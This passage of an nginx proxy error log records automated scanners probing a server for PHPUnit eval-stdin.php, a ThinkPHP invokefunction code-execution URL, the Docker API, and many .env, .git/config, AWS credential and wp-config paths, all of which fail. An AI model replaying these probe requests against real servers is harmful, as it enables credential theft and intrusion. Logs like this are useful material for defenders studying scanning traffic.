/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:14 [error] 305#305: *46205 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:15 [error] 305#305: *46205 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:15 [error] 305#305: *46205 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:15 [error] 305#305: *46205 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:15 [error] 305#305: *46205 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:15 [error] 305#305: *46205 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:16 [error] 305#305: *46205 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:16 [error] 305#305: *46205 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:16 [error] 305#305: *46205 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:16 [error] 305#305: *46205 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:17 [error] 305#305: *46205 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:51:10 [error] 305#305: *46210 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:55:47 [error] 307#307: *47702 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 167.94.138.55, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:06:34 [error] 308#308: *47712 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.193.226, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:39:08 [error] 308#308: *47722 open() "/var/www/html/.env" failed (2: No such file or directory), client: 109.199.104.175, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:10 [error] 305#305: *47727 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 06:59:27 [error] 305#305: *47732 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:27 [error] 305#305: *47732 open() "/var/www/html/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:27 [error] 305#305: *47732 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:30 [error] 305#305: *47733 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:32 [error] 305#305: *47734 open() "/var/www/html/env/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /env/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:32 [error] 305#305: *47734 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:32 [error] 305#305: *47734 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/new/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/new/.env.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.local HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/new/.env.production" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/new/.env.staging" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.staging HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/_phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/_profiler/phpinfo/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/_profiler/phpinfo/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/wp-config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /wp-config HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/aws-secret.yaml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws-secret.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:35 [error] 305#305: *47735 open() "/var/www/html/awstats/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /awstats/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:37 [error] 305#305: *47736 open() "/var/www/html/conf/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /conf/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:39 [error] 305#305: *47737 open() "/var/www/html/cron/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /cron/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:39 [error] 305#305: *47737 open() "/var/www/html/www/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /www/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:41 [error] 305#305: *47738 open() "/var/www/html/docker/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:41 [error] 305#305: *47738 open() "/var/www/html/docker/app/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker/app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:41 [error] 305#305: *47738 open() "/var/www/html/env.backup" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /env.backup HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:41 [error] 305#305: *47738 open() "/var/www/html/xampp/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /xampp/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:43 [error] 305#305: *47739 open() "/var/www/html/lara/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /lara/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:43 [error] 305#305: *47739 open() "/var/www/html/lara/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /lara/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:43 [error] 305#305: *47739 open() "/var/www/html/laravel/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:43 [error] 305#305: *47739 open() "/var/www/html/.vscode/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.vscode/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:43 [error] 305#305: *47739 open() "/var/www/html/js/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /js/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:44 [error] 305#305: *47740 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:46 [error] 305#305: *47741 open() "/var/www/html/laravel/core/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/core/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:46 [error] 305#305: *47741 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:46 [error] 305#305: *47741 open() "/var/www/html/mailer/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /mailer/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:46 [error] 305#305: *47741 open() "/var/www/html/nginx/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /nginx/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:49 [error] 305#305: *47742 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/site/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /site/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/xampp/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /xampp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/main/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /main/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/node_modules/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /node_modules/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/kyc/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /kyc/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/prod/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /prod/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/.env.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.bak HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/api/shared/config/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/api/shared/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:50 [error] 306#306: *47743 open() "/var/www/html/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/website/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /website/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/development/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /development/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/api/shared/config/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/api/shared/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/api/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/service/email_service.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /service/email_service.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:52 [error] 306#306: *47744 open() "/var/www/html/node/.env_example" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /node/.env_example HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:54 [error] 306#306: *47745 open() "/var/www/html/.env.production.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.production.local HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:54 [error] 306#306: *47745 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:54 [error] 306#306: *47745 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:54 [error] 306#306: *47745 open() "/var/www/html/.env.stage" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.stage HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/.env.old" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.old HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/.env_sample" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env_sample HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/.env.prod" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.prod HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/crm/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /crm/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/local/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /local/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/core/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /core/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/apps/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /apps/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/application/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /application/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/web/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /web/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/wp-config.php.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.bak HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:56 [error] 306#306: *47746 open() "/var/www/html/dashboard/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /dashboard/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/admin/server_info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/server_info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/server_info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server_info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /test.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/server-info" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server-info HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/server-info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server-info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 06:59:59 [error] 307#307: *53691 open() "/var/www/html/secured/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /secured/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:01 [error] 307#307: *53691 open() "/var/www/html/appsettings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /appsettings.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:01 [error] 307#307: *53691 open() "/var/www/html/config/aws.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:01 [error] 307#307: *53691 open() "/var/www/html/settings.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:01 [error] 307#307: *53691 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:03 [error] 307#307: *53691 open() "/var/www/html/application.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /application.properties HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:04 [error] 308#308: *64094 open() "/var/www/html/storage/logs/laravel.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/laravel.log HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:04 [error] 308#308: *64094 open() "/var/www/html/karma.conf.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /karma.conf.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:04 [error] 308#308: *64094 open() "/var/www/html/swagger.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /swagger.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:06 [error] 307#307: *65581 open() "/var/www/html/backend/config/default.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/default.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:06 [error] 307#307: *65581 open() "/var/www/html/app.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:08 [error] 307#307: *65581 open() "/var/www/html/api/objects/codes.php.save" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/objects/codes.php.save HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:10 [error] 306#306: *74498 open() "/var/www/html/backend/config/development.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/development.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:11 [error] 306#306: *74498 open() "/var/www/html/config/application.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/application.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:11 [error] 306#306: *74498 open() "/var/www/html/config/storage.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/storage.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:12 [error] 306#306: *74498 open() "/var/www/html/configs/s3_config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /configs/s3_config.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:15 [error] 306#306: *81929 open() "/var/www/html/getcpuutil.php-bakworking" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /getcpuutil.php-bakworking HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:16 [error] 305#305: *86388 open() "/var/www/html/my_env/chakaash.py" failed (2: No 